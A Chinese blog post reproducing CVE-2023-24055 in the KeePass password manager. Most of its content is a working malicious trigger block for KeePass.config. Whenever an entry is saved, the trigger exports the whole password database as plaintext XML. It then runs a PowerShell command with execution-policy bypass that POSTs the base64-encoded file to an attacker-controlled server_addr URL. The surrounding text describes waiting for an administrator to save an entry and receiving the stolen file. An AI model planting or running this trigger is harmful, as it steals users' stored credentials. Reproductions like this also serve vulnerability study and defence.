CVE-2023-24055 Keepass密码管理工具漏洞复现

KeePass 是一款免费的开源密码管理器
对 KeePass 配置文件具有写入权限
KeePass.config
在这里插入图片描述
打开KeePass 配置文件KeePass.config,在TriggerSystem处写入相应的触发器代码
在这里插入图片描述

		<Triggers>
			<Trigger>
				<Guid>UVa+fd1Qr0KAcynoacKFKw==</Guid>
				<Name>Trigger</Name>
				<Events>
					<Event>
						<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
						<Parameters>
							<Parameter>0</Parameter>
							<Parameter />
						</Parameters>
					</Event>
				</Events>
				<Conditions />
				<Actions>
					<Action>
						<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
						<Parameters>
							<Parameter>C:\Users\a\AppData\Local\Temp\exploit.xml</Parameter>//指定文件的导出路径
							<Parameter>KeePass XML (2.x)</Parameter>
							<Parameter />
							<Parameter />
						</Parameters>
					</Action>
					<Action>
						<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
						<Parameters>
							<Parameter>PowerShell.exe</Parameter> //powershell绕过权限不加载本地配置文件,执行Invoke-WebRequest发送post请求请求体为base64编码的字节码文件
							<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://server_addr/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('C:\Users\a\AppData\Local\Temp\exploit.xml')))</Parameter>
							<Parameter>False</Parameter>
							<Parameter>1</Parameter>
							<Parameter />
						</Parameters>
					</Action>
				</Actions>
			</Trigger>
		</Triggers>
	</TriggerSystem>

写入触发器代码后,等待管理员登录,当有新的密码条目被添加并保存时,密码就会被导出powershell执行就会触发把文件内容带出
在这里插入图片描述添加一条记录保存,直接保存就能触发应该是保存的触发器,收到请求
在这里插入图片描述导出的文件
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值